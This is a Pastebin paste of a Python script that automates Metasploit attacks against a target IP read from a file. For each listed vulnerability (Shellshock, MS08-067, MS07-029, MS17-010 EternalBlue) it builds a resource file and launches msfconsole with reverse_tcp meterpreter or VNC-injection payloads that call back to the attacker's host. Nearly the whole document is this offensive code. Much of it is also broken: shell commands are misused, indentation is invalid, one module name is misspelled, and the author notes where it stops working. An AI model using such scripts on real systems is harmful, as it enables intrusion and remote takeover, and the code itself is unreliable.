SHARE
TWEET

Untitled

a guest Mar 25th, 2019 81 Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
  1. import os
  2.  
  3. #searches file for list of exploits
  4. #if found go to X else keep going
  5.  
  6. working_dir = "/home/Desktop"
  7. target_file = "IP.txt"
  8. Our_IP ="192.168.1.200"
  9. hosts = ""
  10. print target_file
  11. print working_dir
  12. global Host_is_set
  13. global our_IP
  14. #global working_dir
  15. global Target_file
  16. ##creats exploit file then ran via command in func below
  17. def CVE_SHELL(hosts): #name of function and host defined
  18.  with open('IP.txt', 'rb') as fp:
  19.   hosts = fp.read()[:+12]
  20.  
  21.  
  22.   os.system('touch /Desktop custom_shock.rc') # makes file with bahs command
  23.   os.system('use exploit/multi/http/apache_mod_cgi_bash_env_exec > custom_shock.rc') #metasploit script shit
  24.   os.system('echo set RHOST '+hosts+' >> custom_shock.rc')
  25.   os.system('echo set payload windows/meterpreter/reverse_tcp >> custom_shock.rc')
  26.   os.system('echo set LHOST ' + Our_IP + ' >>  custom_shock.rc')
  27.   os.system('echo set ConnectTimeout 30 >> custom_shock.rc')
  28.   os.system('echo set AutoRunScript multi_console_command -rc ' + working_dir + '  >> custom_shock.rc')
  29.   os.system('echo exploit -j -z >> custom_shock.rc')
  30.   os.system('echo exit -y >> custom_shock.rc')
  31.   os.system('/usr/share/metasploit-framework/modules msfconsole -r custom_shock.rc')
  32.   return hosts
  33.   host = true
  34.   Host_is_set = True;
  35. ##make exploit script:
  36.        
  37.  
  38.  
  39. def CVE_2009_3103(hosts): #name of function and host defined
  40.  with open('IP.txt', 'rb') as fp:
  41.   hosts = fp.read()[:+12]
  42.  
  43.   global Host_is_set
  44.   global our_IP
  45.   global working_dir
  46.   global Target_file
  47.   os.system('touch /Desktop CVE3103.rc') # makes file with bash command
  48.   os.system('use exploit/windows/dcerpc/ms07_029_msdns_zonename > CVE3103.rc') #metasploit script shit
  49.   os.system('echo set RHOST '+ hosts +' >> CVE3103.rc')
  50.   os.system('echo set PAYLOAD windows/meterpreter/reverse_tcp   >> CVE3103.rc')
  51.   os.system('echo set LHOST ' + Our_IP + ' >>  CVE3103.rc.rc')
  52.   os.system('echo set ConnectTimeout 30 >> CVE3103.rc')
  53.   os.system('echo set AutoRunScript multi_console_command -rc ' + working_dir + '  >> CVE3103.rc')
  54.   os.system('echo use exploit/multi/http/apache_mod_cgi_bash_env_exec  -r >> CVE3103.rc')
  55.   os.system('echo run >> CVE3103.rc')
  56.   os.system('sudo msfconsole -r CVE3103.rc')
  57.   return hosts
  58.   host = true
  59.   Host_is_set = True;
  60. ##make exploit script:
  61.  
  62. def MS07_029(hosts):
  63.  with open('IP.txt', 'rb') as fp:
  64.   hosts = fp.read()[:+12]
  65.   os.system('touch /Desktop MS029.rc') # makes file with bash command
  66.   os.system('use exploit/windows/smb/ms07_029_msdns_zonename > MS029.rc') #metasploit script shit
  67.   os.system('echo set RHOST '+ hosts +' >> MS029.rc')
  68.   os.system('echo set PAYLOAD windows/vncinject/reverse_tcp      >> MS029.rc')
  69.   os.system('echo set LHOST ' + Our_IP + ' >>  MS029.rc')
  70.   os.system('echo set ConnectTimeout 30 >> MS029.rc')
  71.   os.system('echo set AutoRunScript multi_console_command -rc ' + working_dir + '  >> MS029.rc')
  72.   os.system('echo use exploit/multi/http/apache_mod_cgi_bash_env_exec  -r >> MS029.rc')
  73.   os.system('echo run >> MS029.rc')
  74.   os.system('sudo msfconsole -r MS029.rc')
  75.   return hosts
  76.   host = true
  77.   Host_is_set = True;
  78.   def MS08_067(hosts): #name of function and host defined
  79.    with open('IP.txt', 'rb') as fp:
  80.     hosts = fp.read()[:+12]
  81.   os.system('touch /Desktop MS067.rc') # makes file with bash command
  82.   os.system('use exploit/windows/smb/ms08_067_netapi > MS067.rc') #metasploit script shit
  83.   os.system('echo set RHOST '+ hosts +' >> MS067.rc')
  84.   os.system('echo set PAYLOAD windows/vncinject/reverse_tcp      >> MS067.rc')
  85.   os.system('echo set LHOST ' + Our_IP + ' >>  MS067.rc')
  86.   os.system('echo set ConnectTimeout 30 >> MS067.rc')
  87.   os.system('echo set AutoRunScript multi_console_command -rc ' + working_dir + '  >> MS067.rc')
  88.   os.system('echo use exploit/multi/http/apache_mod_cgi_bash_env_exec  -r >> MS067.rc')
  89.   os.system('echo run >> MS067.rc')
  90.   os.system('sudo msfconsole -r MS067.rc')
  91.   return hosts
  92.   host = true
  93.   Host_is_set = True;
  94.  
  95.  
  96.  
  97.  def MS17_010(hosts): #name of function and host defined
  98.  with open('IP.txt', 'rb') as fp:
  99.   hosts = fp.read()[:+12]
  100.   os.system('touch /Desktop MS010.rc') # makes file with bash command
  101.   os.system('use eexploit/windows/smb/ms17_010_eternalblue > MS010.rc') #metasploit script shit
  102.   os.system('echo set RHOST '+ hosts +' >> MS010.rc')
  103.   os.system('echo set PAYLOAD windows/x64/vncinject/reverse_tcp      >> MS010.rc')
  104.   os.system('echo set LHOST ' + Our_IP + ' >>  MS010.rc')
  105.   os.system('echo set ConnectTimeout 30 >> MS010.rc')
  106.   os.system('echo set AutoRunScript multi_console_command -rc ' + working_dir + '  >> MS010.rc')
  107.  
  108. #stopps working form here
  109.   os.system('echo use exploit/multi/http/apache_mod_cgi_bash_env_exec  -r >> MS010.rc')
  110.   os.system('sudo msfconsole -r MS010.rc')
  111.   return hosts
  112.   host = true
  113.   Host_is_set = True;
  114.  
  115. if __name__ == "__main__":
  116.  
  117.     with open('exploits.txt', 'r') as searchfile:
  118.             for line in searchfile:
  119.                  if 'CVE-2014-6271' in line:
  120.                     print('Omae Wa Mou Shindeiru')
  121.                     CVE_SHELL(hosts)
  122.          elif 'CVE2009-3103' in line:
  123.                     print('ooh senpai UwU')
  124.                     CVE_2009_3103(hosts)
  125.          elif 'MS07-029' in line:
  126.             print('ITS OVER 9000')
  127.             MS07_029(hosts)
  128.          elif 'MS08-067' in line:
  129.             print('ima fireing my lazor brawwwwwww')
  130.          elif 'MS17-010' in line:
  131.             print('popping the shell')
RAW Paste Data
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy. OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!
 
Top